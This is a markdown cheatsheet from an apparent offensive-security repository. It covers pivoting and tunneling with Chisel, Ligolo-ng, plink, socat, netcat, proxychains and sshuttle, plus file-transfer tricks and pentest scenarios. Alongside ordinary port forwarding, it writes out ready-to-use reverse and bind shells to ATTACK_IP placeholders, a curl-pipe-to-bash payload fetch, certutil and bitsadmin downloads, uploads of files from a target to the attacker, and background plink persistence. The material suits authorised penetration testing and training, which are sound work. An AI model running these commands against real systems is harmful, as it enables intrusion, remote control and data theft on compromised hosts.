daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

tunneling-tools.md (36059B)


      1 ---
      2 title: "Tunneling Tools"
      3 description: "Chisel, socat, plink and SSH tunneling patterns for port forwarding and pivoting through hosts."
      4 category: tunneling-pivoting
      5 tags: [pivoting, tunneling, port-forwarding]
      6 tools: [Chisel, socat, plink, SSH]
      7 difficulty: advanced
      8 updated: "2026-08-09"
      9 source: "vault:Misc/Tunneling.md"
     10 ---
     11 
     12 # Tunneling Tools Cheatsheet
     13 
     14 ## Quick Reference Table
     15 
     16 | Tool | Best For | Requires Root | Stealthy | Multi-Platform |
     17 |------|----------|---------------|----------|----------------|
     18 | **Ligolo-ng** | Full network pivoting | Only on attacker | High | ✅ |
     19 | **Chisel** | Quick SOCKS proxy | No | Medium | ✅ |
     20 | **SSHuttle** | VPN-like tunneling | Yes (attacker) | High | Linux/Mac |
     21 | **Plink** | Windows SSH tunneling | No | High | Windows only |
     22 | **Socat** | Port forwarding/relays | No | High | Linux/Windows |
     23 | **Netcat** | Simple port forwarding | No | Medium | ✅ |
     24 | **Proxychains** | Route tools via proxy | No | N/A | Linux/Mac |
     25 
     26 ## Installed Tools Location
     27 ```
     28 tunneling-tools/
     29 ├── chisel/          # TCP/UDP tunnel over HTTP (Fast SOCKS proxy)
     30 ├── ligolo-ng/       # Advanced TUN-based tunneling (VPN-like, no SOCKS needed!)
     31 ├── plink/           # SSH client for Windows (PuTTY Link)
     32 ├── socat/           # Multipurpose relay (Port forwarding, shell upgrades)
     33 ├── nc/              # Netcat (ncat) - Classic networking swiss army knife
     34 ├── proxychains/     # Route tools through SOCKS/HTTP proxies (Install via brew)
     35 └── sshuttle/        # VPN over SSH (Install via brew)
     36 ```
     37 
     38 ---
     39 
     40 ## CHISEL
     41 **Best for:** Quick SOCKS proxy setup, HTTP-based tunneling (bypasses restrictive firewalls)
     42 
     43 ### Start Server (Attack Box)
     44 ```bash
     45 # macOS (Apple Silicon)
     46 ./chisel/macos/chisel_darwin_arm64 server -p 8080 --reverse
     47 
     48 # macOS (Intel)
     49 ./chisel/macos/chisel_darwin_amd64 server -p 8080 --reverse
     50 
     51 # Linux
     52 ./chisel/linux/chisel_linux_amd64 server -p 8080 --reverse
     53 
     54 # With authentication (recommended)
     55 ./chisel server -p 8080 --reverse --auth user:password
     56 
     57 # Verbose mode (see connections)
     58 ./chisel server -p 8080 --reverse -v
     59 ```
     60 
     61 ### Connect Client (Target)
     62 ```bash
     63 # Linux - Reverse SOCKS proxy
     64 ./chisel_linux_amd64 client ATTACK_IP:8080 R:1080:socks
     65 
     66 # Windows - Reverse SOCKS proxy
     67 chisel_windows_amd64.exe client ATTACK_IP:8080 R:1080:socks
     68 
     69 # With authentication
     70 ./chisel client --auth user:password ATTACK_IP:8080 R:1080:socks
     71 
     72 # Multiple port forwards
     73 ./chisel client ATTACK_IP:8080 R:1080:socks R:8888:localhost:80 R:3389:10.10.10.5:3389
     74 ```
     75 
     76 ### Common Chisel Patterns
     77 ```bash
     78 # Reverse SOCKS (most common - access target's network from attacker)
     79 chisel client ATTACK_IP:8080 R:1080:socks
     80 
     81 # Forward specific port (expose target's service on attacker)
     82 chisel client ATTACK_IP:8080 R:8888:127.0.0.1:80
     83 
     84 # Local SOCKS (less common - access attacker's network from target)
     85 chisel client ATTACK_IP:8080 1080:socks
     86 
     87 # Remote forward with specific bind address
     88 chisel client ATTACK_IP:8080 R:0.0.0.0:9999:localhost:80
     89 ```
     90 
     91 ### Usage with Proxychains
     92 ```bash
     93 # After establishing SOCKS proxy on port 1080
     94 proxychains4 nmap -sT -Pn 10.10.10.0/24
     95 proxychains4 curl http://internal-server
     96 proxychains4 firefox  # Browse internal web apps
     97 ```
     98 
     99 ---
    100 
    101 ## LIGOLO-NG
    102 **Best for:** Full network pivoting without SOCKS, TUN-based (works like a VPN), automatic routing
    103 
    104 ### Setup TUN Interface (Attack Box - One Time Setup)
    105 
    106 #### Linux
    107 ```bash
    108 sudo ip tuntap add user $(whoami) mode tun ligolo
    109 sudo ip link set ligolo up
    110 ```
    111 
    112 #### macOS
    113 ```bash
    114 # Install tuntaposx if needed
    115 brew install --cask tuntap
    116 
    117 # Create interface (done automatically by ligolo-ng on macOS)
    118 ```
    119 
    120 #### Windows
    121 ```powershell
    122 # Ligolo-ng handles TUN interface automatically on Windows
    123 # Run as Administrator
    124 ```
    125 
    126 ### Start Proxy (Attack Box)
    127 ```bash
    128 # Linux
    129 ./ligolo-ng/linux/proxy -selfcert -laddr 0.0.0.0:11601
    130 
    131 # macOS
    132 ./ligolo-ng/macos/proxy -selfcert -laddr 0.0.0.0:11601
    133 
    134 # With custom certificate
    135 ./proxy -certfile server.crt -keyfile server.key -laddr 0.0.0.0:11601
    136 
    137 # Enable autoroute (automatically adds routes - v0.8+)
    138 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute
    139 
    140 # With Web UI (multiplayer mode - v0.8+)
    141 ./proxy -selfcert -laddr 0.0.0.0:11601 -api 127.0.0.1:8080
    142 ```
    143 
    144 ### Connect Agent (Target)
    145 ```bash
    146 # Linux
    147 ./agent -connect ATTACK_IP:11601 -ignore-cert
    148 
    149 # Windows
    150 agent.exe -connect ATTACK_IP:11601 -ignore-cert
    151 
    152 # With specific network interface
    153 ./agent -connect ATTACK_IP:11601 -ignore-cert -bind 192.168.1.10
    154 
    155 # Retry connection on failure
    156 ./agent -connect ATTACK_IP:11601 -ignore-cert -retry
    157 ```
    158 
    159 ### Ligolo Console Commands
    160 ```
    161 # Session management
    162 session                                      # List all connected sessions
    163 session <id>                                 # Select a session
    164 info                                         # Show session info
    165 
    166 # Network discovery
    167 ifconfig                                     # Show target's network interfaces
    168 listener_list                                # Show active listeners
    169 
    170 # Tunneling
    171 start                                        # Start the tunnel
    172 stop                                         # Stop the tunnel
    173 
    174 # Port forwarding (reverse - opens port on target)
    175 listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
    176 listener_add --addr 10.10.10.5:80 --to 192.168.1.100:8080
    177 listener_stop <id>                           # Stop a listener
    178 
    179 # Remote agent control
    180 agent_kill                                   # Remotely terminate the agent
    181 ```
    182 
    183 ### Add Routes (Attack Box)
    184 
    185 #### Linux
    186 ```bash
    187 # Add route for internal network
    188 sudo ip route add 10.10.10.0/24 dev ligolo
    189 
    190 # Add multiple routes
    191 sudo ip route add 172.16.0.0/16 dev ligolo
    192 sudo ip route add 192.168.50.0/24 dev ligolo
    193 
    194 # View routes
    195 ip route | grep ligolo
    196 ```
    197 
    198 #### macOS
    199 ```bash
    200 # Add route
    201 sudo route add -net 10.10.10.0/24 -interface utun
    202 # Note: utun interface number may vary (utun5, utun6, etc.)
    203 # Check with: ifconfig | grep utun
    204 
    205 # Delete route
    206 sudo route delete 10.10.10.0/24
    207 ```
    208 
    209 #### Windows
    210 ```powershell
    211 # Add route
    212 route add 10.10.10.0 mask 255.255.255.0 10.0.0.1
    213 
    214 # View routes
    215 route print
    216 ```
    217 
    218 ### Complete Workflow Example
    219 ```bash
    220 # 1. Start proxy on attacker
    221 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute
    222 
    223 # 2. Run agent on compromised host
    224 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    225 
    226 # 3. In ligolo console
    227 ligolo-ng » session                    # See connected agent
    228 ligolo-ng » session 1                  # Select the agent
    229 [Agent] ligolo-ng » ifconfig           # View target networks
    230 [Agent] ligolo-ng » start              # Start tunnel
    231 
    232 # 4. Add routes (if not using autoroute)
    233 sudo ip route add 172.16.5.0/24 dev ligolo
    234 
    235 # 5. Access internal network directly
    236 nmap -sT -Pn 172.16.5.0/24             # No proxychains needed!
    237 ssh user@172.16.5.10
    238 curl http://172.16.5.50:8080
    239 ```
    240 
    241 ### Double Pivoting (Pivot through multiple networks)
    242 ```bash
    243 # Network topology: Attacker -> Host1 -> Host2 -> Target Network
    244 
    245 # 1. Setup pivot on Host1
    246 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    247 
    248 # 2. From attacker, add route to Host1's network
    249 sudo ip route add 192.168.100.0/24 dev ligolo
    250 
    251 # 3. Setup listener on Host1 for Host2 to connect back
    252 listener_add --addr 192.168.100.50:11601 --to ATTACKER_IP:11601
    253 
    254 # 4. From Host2, connect through Host1
    255 ./agent -connect 192.168.100.50:11601 -ignore-cert
    256 
    257 # 5. Add route to Host2's network
    258 sudo ip route add 10.20.30.0/24 dev ligolo
    259 ```
    260 
    261 ---
    262 
    263 ## PLINK (Windows SSH Client)
    264 **Best for:** SSH tunneling from Windows targets (no installation needed, single executable)
    265 
    266 ### Prerequisites
    267 ```bash
    268 # On attack box, enable SSH password authentication
    269 sudo vim /etc/ssh/sshd_config
    270 # Set: PasswordAuthentication yes
    271 sudo systemctl restart sshd
    272 
    273 # Create user for tunneling
    274 sudo useradd -m tunneluser
    275 sudo passwd tunneluser
    276 ```
    277 
    278 ### Reverse SSH Tunnel (Expose target service on attacker)
    279 ```cmd
    280 # Expose target's localhost:80 on attacker's port 9999
    281 plink.exe -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password
    282 
    283 # Expose target's RDP to attacker
    284 plink.exe -R 3389:127.0.0.1:3389 user@ATTACK_IP -pw password
    285 
    286 # Expose internal network service
    287 plink.exe -R 8080:10.10.10.50:80 user@ATTACK_IP -pw password
    288 
    289 # Background execution (no window)
    290 plink.exe -ssh -N -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password
    291 ```
    292 
    293 ### Dynamic SOCKS Proxy (Access target's network from attacker)
    294 ```cmd
    295 # Creates SOCKS proxy on attacker's port 1080
    296 plink.exe -D 1080 user@ATTACK_IP -pw password
    297 
    298 # Headless mode
    299 plink.exe -N -D 1080 user@ATTACK_IP -pw password
    300 ```
    301 
    302 ### Local Port Forward (Access attacker's service from target)
    303 ```cmd
    304 # Forward local 8080 to internal service
    305 plink.exe -L 8080:INTERNAL_IP:80 user@ATTACK_IP -pw password
    306 
    307 # Access attacker's tool on target
    308 plink.exe -L 9001:ATTACK_IP:9001 user@ATTACK_IP -pw password
    309 ```
    310 
    311 ### Persistence & Stealth
    312 ```cmd
    313 # Run in background (no console)
    314 start /B plink.exe -N -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password
    315 
    316 # Auto-accept host key (first connection)
    317 echo y | plink.exe -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password
    318 
    319 # Using SSH key instead of password
    320 plink.exe -i private_key.ppk -R 9999:127.0.0.1:80 user@ATTACK_IP
    321 ```
    322 
    323 ---
    324 
    325 ## SOCAT
    326 **Best for:** Port forwarding, shell upgrades, creating relays, encrypted tunnels
    327 
    328 ### Basic Port Forwarding
    329 ```bash
    330 # Forward local 8080 to remote host (TCP)
    331 ./socat_linux_x64 TCP-LISTEN:8080,fork TCP:TARGET_IP:80
    332 
    333 # UDP port forward
    334 ./socat_linux_x64 UDP-LISTEN:53,fork UDP:DNS_SERVER:53
    335 
    336 # Bind to specific interface
    337 ./socat_linux_x64 TCP-LISTEN:8080,bind=192.168.1.10,fork TCP:TARGET_IP:80
    338 
    339 # IPv6 forwarding
    340 socat TCP6-LISTEN:8080,fork TCP6:[fe80::1]:80
    341 ```
    342 
    343 ### Reverse Shell Relay (Pivot through host)
    344 ```bash
    345 # On pivot host - relay connections to attacker
    346 ./socat_linux_x64 TCP-LISTEN:4444,fork TCP:ATTACK_IP:4444
    347 
    348 # Victim connects to pivot
    349 bash -i >& /dev/tcp/PIVOT_IP/4444 0>&1
    350 
    351 # Attacker receives shell
    352 nc -lvnp 4444
    353 ```
    354 
    355 ### TTY Shell Upgrade (Fully Interactive Shell)
    356 ```bash
    357 # Step 1: Attacker - prepare listener
    358 socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
    359 
    360 # Step 2: Target - connect with PTY
    361 ./socat_linux_x64 exec:'bash -li',pty,stderr,setsid,sigint,sane TCP:ATTACK_IP:4444
    362 
    363 # Result: Full TTY with job control, tab completion, clear screen, etc.
    364 ```
    365 
    366 ### Encrypted Tunnels (OpenSSL)
    367 ```bash
    368 # Generate certificate
    369 openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 365 -out bind.crt
    370 cat bind.key bind.crt > bind.pem
    371 
    372 # Listener (encrypted)
    373 socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash
    374 
    375 # Client (connect)
    376 socat - OPENSSL:TARGET_IP:4443,verify=0
    377 ```
    378 
    379 ### File Transfers
    380 ```bash
    381 # Sender
    382 socat TCP-LISTEN:9999,reuseaddr FILE:file.zip
    383 
    384 # Receiver
    385 socat TCP:SENDER_IP:9999 CREATE:received.zip
    386 ```
    387 
    388 ### Port Scanning with Socat
    389 ```bash
    390 # Simple port check
    391 socat - TCP:TARGET:80,connect-timeout=1
    392 
    393 # Banner grabbing
    394 echo "" | socat - TCP:TARGET:22,connect-timeout=1
    395 ```
    396 
    397 ### Creating Reverse Shells
    398 ```bash
    399 # Bind shell (target)
    400 socat TCP-LISTEN:5555,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
    401 
    402 # Reverse shell (target to attacker)
    403 socat EXEC:/bin/bash TCP:ATTACK_IP:4444
    404 
    405 # Windows reverse shell
    406 socat TCP:ATTACK_IP:4444 EXEC:'cmd.exe',pipes
    407 ```
    408 
    409 ---
    410 
    411 ## NETCAT (NCAT)
    412 **Best for:** Quick port forwarding, simple relays, port scanning, basic file transfers
    413 
    414 ### Basic Port Forwarding
    415 ```bash
    416 # Simple TCP relay (pivot)
    417 mkfifo /tmp/f; cat /tmp/f | nc TARGET_IP 80 | nc -l -p 8080 > /tmp/f
    418 
    419 # Persistent relay (using while loop)
    420 while true; do nc -l -p 8080 -c "nc TARGET_IP 80"; done
    421 ```
    422 
    423 ### Reverse Shell Relay
    424 ```bash
    425 # On pivot host - relay to attacker
    426 mkfifo /tmp/f; nc ATTACK_IP 4444 < /tmp/f | nc -l -p 9999 > /tmp/f
    427 
    428 # Victim connects to pivot:9999
    429 # Attacker gets shell on 4444
    430 ```
    431 
    432 ### File Transfers
    433 ```bash
    434 # Receiver (start first)
    435 ./ncat_linux_x64 -l -p 9999 > received_file.zip
    436 
    437 # Sender
    438 ./ncat_linux_x64 TARGET_IP 9999 < file.zip
    439 
    440 # With progress (using pv)
    441 pv file.zip | nc TARGET_IP 9999
    442 ```
    443 
    444 ### Port Scanning
    445 ```bash
    446 # Check single port
    447 nc -zv TARGET_IP 80
    448 
    449 # Scan range
    450 nc -zv TARGET_IP 20-25
    451 
    452 # Banner grabbing
    453 echo "" | nc -v -n -w1 TARGET_IP 22
    454 ```
    455 
    456 ### Creating Backdoors
    457 ```bash
    458 # Bind shell (target)
    459 ./ncat_linux_x64 -l -p 5555 -e /bin/bash
    460 
    461 # Reverse shell (target to attacker)
    462 ./ncat_linux_x64 ATTACK_IP 4444 -e /bin/bash
    463 
    464 # Windows reverse shell
    465 ncat.exe ATTACK_IP 4444 -e cmd.exe
    466 ```
    467 
    468 ### Chat/Communication Channel
    469 ```bash
    470 # Listener
    471 nc -l -p 4444
    472 
    473 # Client
    474 nc TARGET_IP 4444
    475 # Type messages, they appear on both sides
    476 ```
    477 
    478 ---
    479 
    480 ## PROXYCHAINS (Install Required)
    481 **Best for:** Routing any tool through SOCKS/HTTP proxies (pairs well with Chisel/SSH)
    482 
    483 ### Installation
    484 ```bash
    485 # macOS
    486 brew install proxychains-ng
    487 
    488 # Kali Linux / Debian / Ubuntu
    489 sudo apt install proxychains4 -y
    490 
    491 # Arch Linux
    492 sudo pacman -S proxychains-ng
    493 ```
    494 
    495 ### Config File Locations
    496 ```
    497 # macOS (Homebrew)
    498 /opt/homebrew/etc/proxychains.conf      # Apple Silicon
    499 /usr/local/etc/proxychains.conf         # Intel Mac
    500 
    501 # Linux
    502 /etc/proxychains.conf                   # System-wide (older version)
    503 /etc/proxychains4.conf                  # proxychains-ng (newer)
    504 ~/.proxychains/proxychains.conf         # User config (highest priority)
    505 
    506 # Kali Linux
    507 /etc/proxychains4.conf
    508 ```
    509 
    510 ### Configuration Examples
    511 ```bash
    512 # Edit config file
    513 sudo nano /etc/proxychains4.conf
    514 
    515 # Basic SOCKS5 proxy (Chisel default)
    516 [ProxyList]
    517 socks5 127.0.0.1 1080
    518 
    519 # SOCKS4 proxy
    520 socks4 127.0.0.1 1080
    521 
    522 # HTTP proxy
    523 http 127.0.0.1 8080
    524 
    525 # Chain multiple proxies
    526 socks5 127.0.0.1 1080
    527 socks5 10.10.10.5 1081
    528 http 172.16.0.1 3128
    529 
    530 # Proxy with authentication
    531 socks5 127.0.0.1 1080 username password
    532 ```
    533 
    534 ### Proxy Modes (in config file)
    535 ```bash
    536 # Dynamic chain (dead proxies auto-skipped)
    537 dynamic_chain
    538 
    539 # Strict chain (all proxies must work)
    540 strict_chain
    541 
    542 # Random chain (randomize proxy order)
    543 random_chain
    544 # random_chain = 2  # Use 2 random proxies from list
    545 ```
    546 
    547 ### Common Usage
    548 ```bash
    549 # Nmap through proxy (use -sT for TCP connect scan)
    550 proxychains4 nmap -sT -Pn 10.10.10.0/24
    551 
    552 # SSH to internal host
    553 proxychains4 ssh user@internal_host
    554 
    555 # Web requests
    556 proxychains4 curl http://internal-web
    557 proxychains4 wget http://internal-site/file.zip
    558 
    559 # Firefox browser (browse internal web apps)
    560 proxychains4 firefox
    561 
    562 # RDP through proxy
    563 proxychains4 xfreerdp /v:10.10.10.5 /u:admin
    564 
    565 # Metasploit through proxy
    566 proxychains4 msfconsole
    567 ```
    568 
    569 ### Quiet Mode (Suppress Proxychains Output)
    570 ```bash
    571 # Add to config file
    572 quiet_mode
    573 
    574 # Or use -q flag
    575 proxychains4 -q nmap -sT 10.10.10.0/24
    576 ```
    577 
    578 ### Custom Config File
    579 ```bash
    580 # Use specific config
    581 proxychains4 -f /path/to/custom.conf curl http://target
    582 
    583 # Example custom config
    584 cat << EOF > /tmp/proxy.conf
    585 strict_chain
    586 quiet_mode
    587 [ProxyList]
    588 socks5 127.0.0.1 1080
    589 EOF
    590 
    591 proxychains4 -f /tmp/proxy.conf nmap -sT 10.10.10.5
    592 ```
    593 
    594 ### DNS Configuration
    595 ```bash
    596 # In config file:
    597 proxy_dns  # Route DNS through proxy (default, recommended)
    598 
    599 # Or disable:
    600 #proxy_dns  # Local DNS resolution
    601 ```
    602 
    603 ### Troubleshooting
    604 ```bash
    605 # Test proxy connection
    606 proxychains4 curl -I http://google.com
    607 
    608 # Verbose mode (see all proxy operations)
    609 # Comment out quiet_mode in config
    610 
    611 # If "ERROR: ld.so: object 'libproxychains.so.3'" appears:
    612 # Update config with correct lib path or reinstall proxychains
    613 ```
    614 
    615 ---
    616 
    617 ## SSHUTTLE (Install Required)
    618 **Best for:** VPN-like tunneling over SSH (transparent proxying, no SOCKS needed!)
    619 
    620 ### Installation
    621 ```bash
    622 # macOS
    623 brew install sshuttle
    624 
    625 # Kali Linux / Debian / Ubuntu
    626 sudo apt install sshuttle -y
    627 
    628 # Arch Linux
    629 sudo pacman -S sshuttle
    630 
    631 # Python pip
    632 pip3 install sshuttle
    633 ```
    634 
    635 ### Basic Usage
    636 ```bash
    637 # Route all private networks through pivot
    638 sshuttle -r user@PIVOT_HOST 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
    639 
    640 # Route specific subnet
    641 sshuttle -r user@PIVOT_HOST 10.10.10.0/24
    642 
    643 # Multiple subnets
    644 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 192.168.1.0/24
    645 
    646 # Route everything (0/0) - careful!
    647 sshuttle -r user@PIVOT_HOST 0/0
    648 ```
    649 
    650 ### Advanced Options
    651 ```bash
    652 # Exclude specific hosts/networks
    653 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -x PIVOT_HOST -x 10.10.10.50
    654 
    655 # Use SSH key
    656 sshuttle -r user@PIVOT_HOST -e 'ssh -i /path/to/key' 10.10.10.0/24
    657 
    658 # Specify SSH port
    659 sshuttle -r user@PIVOT_HOST:2222 10.10.10.0/24
    660 
    661 # Verbose mode (see connections)
    662 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -vv
    663 
    664 # DNS through tunnel
    665 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 --dns
    666 
    667 # Auto detect and route all remote subnets
    668 sshuttle -r user@PIVOT_HOST --auto-nets
    669 
    670 # Exclude local DNS
    671 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 --dns --to-ns=8.8.8.8
    672 ```
    673 
    674 ### Daemon Mode (Background)
    675 ```bash
    676 # Run in background
    677 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -D
    678 
    679 # View sshuttle processes
    680 ps aux | grep sshuttle
    681 
    682 # Kill sshuttle
    683 pkill sshuttle
    684 ```
    685 
    686 ### Using Jump Hosts
    687 ```bash
    688 # SSH through jump host
    689 sshuttle -r user@FINAL_HOST -e 'ssh -J user@JUMP_HOST' 10.10.10.0/24
    690 
    691 # Multiple hops
    692 sshuttle -r user@HOST3 -e 'ssh -J user@HOST1,user@HOST2' 10.10.10.0/24
    693 ```
    694 
    695 ### Common Scenarios
    696 ```bash
    697 # Lab/CTF environment
    698 sshuttle -r user@jump.lab.local 10.0.0.0/8 --dns -vv
    699 
    700 # Pentest engagement (exclude your C2 server)
    701 sshuttle -r user@pivot 10.10.0.0/16 -x YOUR_C2_IP
    702 
    703 # Access cloud internal networks
    704 sshuttle -r ubuntu@bastion.aws.com 10.0.0.0/16 172.31.0.0/16
    705 
    706 # Through compromised host with SSH
    707 sshuttle -r root@compromised-host 192.168.100.0/24 --no-latency-control
    708 ```
    709 
    710 ### Troubleshooting
    711 ```bash
    712 # Check firewall rules added by sshuttle
    713 sudo iptables -L -t nat  # Linux
    714 sudo pfctl -s all        # macOS
    715 
    716 # If connection drops
    717 sshuttle -r user@HOST 10.10.10.0/24 --no-latency-control
    718 
    719 # Manually clean up if sshuttle crashes
    720 sudo pkill sshuttle
    721 sudo iptables -t nat -F  # Linux
    722 sudo pfctl -F all        # macOS
    723 
    724 # Test connectivity
    725 ping 10.10.10.5          # After sshuttle is running
    726 curl http://10.10.10.50:80
    727 ```
    728 
    729 ### Comparison with Other Tools
    730 ```
    731 SSHuttle vs Ligolo-ng:
    732 + Simpler (just needs SSH)
    733 + No agent/binary on target
    734 - Requires SSH access
    735 - Slightly slower
    736 
    737 SSHuttle vs Proxychains + Chisel:
    738 + Transparent (no proxychains needed)
    739 + Better performance
    740 + Simpler to use
    741 - Requires SSH
    742 ```
    743 
    744 ---
    745 
    746 ## Quick Transfer Commands
    747 
    748 ### Start HTTP Server (Attacker)
    749 ```bash
    750 # Python3 (default)
    751 python3 -m http.server 8000
    752 
    753 # Python3 on specific interface
    754 python3 -m http.server 8000 --bind 192.168.1.10
    755 
    756 # Python2
    757 python -m SimpleHTTPServer 8000
    758 
    759 # PHP
    760 php -S 0.0.0.0:8000
    761 
    762 # Ruby
    763 ruby -run -e httpd . -p 8000
    764 
    765 # With authentication
    766 python3 -m http.server 8000 --directory /path/to/files
    767 ```
    768 
    769 ### Download on Target
    770 
    771 #### Linux
    772 ```bash
    773 # wget
    774 wget http://ATTACK_IP:8000/chisel_linux_amd64 -O /tmp/chisel && chmod +x /tmp/chisel
    775 
    776 # curl
    777 curl http://ATTACK_IP:8000/chisel_linux_amd64 -o /tmp/chisel && chmod +x /tmp/chisel
    778 
    779 # curl with progress bar
    780 curl -# http://ATTACK_IP:8000/file.zip -o /tmp/file.zip
    781 
    782 # Download and execute in memory (be careful!)
    783 curl http://ATTACK_IP:8000/script.sh | bash
    784 
    785 # Using /dev/tcp if no tools available
    786 cat < /dev/tcp/ATTACK_IP/8000 > /tmp/file
    787 ```
    788 
    789 #### Windows PowerShell
    790 ```powershell
    791 # Invoke-WebRequest (PowerShell 3.0+)
    792 Invoke-WebRequest -Uri http://ATTACK_IP:8000/chisel.exe -OutFile C:\Windows\Temp\chisel.exe
    793 
    794 # Short alias
    795 iwr -uri http://ATTACK_IP:8000/file.zip -o C:\Temp\file.zip
    796 
    797 # WebClient (older PowerShell)
    798 (New-Object System.Net.WebClient).DownloadFile("http://ATTACK_IP:8000/chisel.exe", "C:\Temp\chisel.exe")
    799 
    800 # certutil (sneaky, no PowerShell)
    801 certutil -urlcache -f http://ATTACK_IP:8000/chisel.exe C:\Temp\chisel.exe
    802 
    803 # bitsadmin
    804 bitsadmin /transfer myDownload /download /priority high http://ATTACK_IP:8000/file.exe C:\Temp\file.exe
    805 ```
    806 
    807 #### Windows CMD
    808 ```cmd
    809 # PowerShell one-liner from CMD
    810 powershell -c "Invoke-WebRequest -Uri 'http://ATTACK_IP:8000/file.exe' -OutFile 'C:\Temp\file.exe'"
    811 
    812 # certutil
    813 certutil.exe -urlcache -split -f http://ATTACK_IP:8000/file.exe C:\Temp\file.exe
    814 ```
    815 
    816 ### Upload from Target to Attacker
    817 
    818 #### Using Netcat
    819 ```bash
    820 # Attacker (receiver)
    821 nc -lvnp 9999 > received_file.zip
    822 
    823 # Target (sender)
    824 cat file.zip | nc ATTACK_IP 9999
    825 ```
    826 
    827 #### Using curl (POST)
    828 ```bash
    829 # Attacker (receiver with python)
    830 python3 -m uploadserver 8000
    831 
    832 # Target (sender)
    833 curl -X POST http://ATTACK_IP:8000/upload -F 'files=@/path/to/file.zip'
    834 ```
    835 
    836 ### SMB Transfer (Windows)
    837 
    838 #### Setup SMB Server (Attacker - Linux)
    839 ```bash
    840 # Using impacket
    841 impacket-smbserver share /path/to/share -smb2support
    842 
    843 # With authentication
    844 impacket-smbserver share /path/to/share -smb2support -username user -password pass
    845 ```
    846 
    847 #### Access SMB Share (Target - Windows)
    848 ```cmd
    849 # List share
    850 net view \\ATTACK_IP
    851 
    852 # Copy from share
    853 copy \\ATTACK_IP\share\chisel.exe C:\Temp\
    854 
    855 # Execute from share (no copy)
    856 \\ATTACK_IP\share\chisel.exe
    857 
    858 # Mount share
    859 net use Z: \\ATTACK_IP\share
    860 net use Z: \\ATTACK_IP\share /user:user pass
    861 ```
    862 
    863 ### Base64 Transfer (Small Files)
    864 ```bash
    865 # Encode on attacker
    866 base64 -w0 chisel > chisel.b64
    867 
    868 # Decode on target (Linux)
    869 echo "BASE64_STRING" | base64 -d > chisel && chmod +x chisel
    870 
    871 # Decode on target (Windows PowerShell)
    872 [System.Convert]::FromBase64String("BASE64_STRING") | Set-Content -Path chisel.exe -Encoding Byte
    873 ```
    874 
    875 ---
    876 
    877 ## Common Pentesting Scenarios
    878 
    879 ### Scenario 1: Access Internal Network from Compromised DMZ Host
    880 
    881 **Situation:** You compromised a Linux web server in DMZ (10.50.50.5), need to access internal network (192.168.10.0/24)
    882 
    883 **Solution 1: Ligolo-ng (Best - No SOCKS needed)**
    884 ```bash
    885 # On attacker
    886 ./ligolo-ng/linux/proxy -selfcert -laddr 0.0.0.0:11601 -autoroute
    887 
    888 # On compromised DMZ host
    889 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    890 
    891 # In ligolo console
    892 session 1
    893 start
    894 
    895 # Add route (if autoroute not used)
    896 sudo ip route add 192.168.10.0/24 dev ligolo
    897 
    898 # Access internal network directly
    899 nmap -sT 192.168.10.0/24
    900 ```
    901 
    902 **Solution 2: Chisel + Proxychains (Fast to setup)**
    903 ```bash
    904 # On attacker
    905 ./chisel server -p 8080 --reverse
    906 
    907 # On DMZ host
    908 ./chisel client ATTACKER_IP:8080 R:1080:socks
    909 
    910 # On attacker
    911 proxychains4 nmap -sT 192.168.10.5
    912 ```
    913 
    914 ### Scenario 2: Windows Target with No Direct Outbound Access
    915 
    916 **Situation:** Windows box can only reach another compromised Linux host (pivot), can't reach attacker directly
    917 
    918 **Solution: Double Pivot with Chisel**
    919 ```bash
    920 # Step 1: Setup Chisel on first pivot (Linux)
    921 ./chisel server -p 8080 --reverse
    922 
    923 # Step 2: Windows connects to Linux pivot
    924 chisel.exe client LINUX_PIVOT_IP:8080 R:1080:socks
    925 
    926 # Step 3: On attacker, create another tunnel to reach Windows network via Linux pivot
    927 ssh -L 9999:localhost:1080 user@LINUX_PIVOT_IP
    928 
    929 # Step 4: Configure proxychains to use localhost:9999
    930 # Then access Windows internal network
    931 proxychains4 rdesktop INTERNAL_WINDOWS_IP
    932 ```
    933 
    934 ### Scenario 3: Expose Internal Service to Attacker
    935 
    936 **Situation:** Internal MSSQL server at 172.16.5.10:1433, want to connect from attacker
    937 
    938 **Solution 1: Chisel Reverse Port Forward**
    939 ```bash
    940 # On attacker
    941 ./chisel server -p 8080 --reverse
    942 
    943 # On compromised internal host
    944 ./chisel client ATTACKER_IP:8080 R:1433:172.16.5.10:1433
    945 
    946 # On attacker, connect directly
    947 mssqlclient.py sa:password@127.0.0.1:1433
    948 ```
    949 
    950 **Solution 2: SSH Reverse Tunnel (if SSH available)**
    951 ```bash
    952 # From compromised host
    953 ssh -R 1433:172.16.5.10:1433 user@ATTACKER_IP
    954 
    955 # On attacker
    956 mssqlclient.py sa:password@127.0.0.1:1433
    957 ```
    958 
    959 ### Scenario 4: Port Forward Through Windows (No Custom Tools)
    960 
    961 **Situation:** Compromised Windows server, need tunnel but can't upload tools
    962 
    963 **Solution: Built-in Windows Port Forward (netsh)**
    964 ```cmd
    965 # Forward local port 8080 to internal service
    966 netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.10.10.50
    967 
    968 # View forwards
    969 netsh interface portproxy show all
    970 
    971 # Delete forward
    972 netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
    973 ```
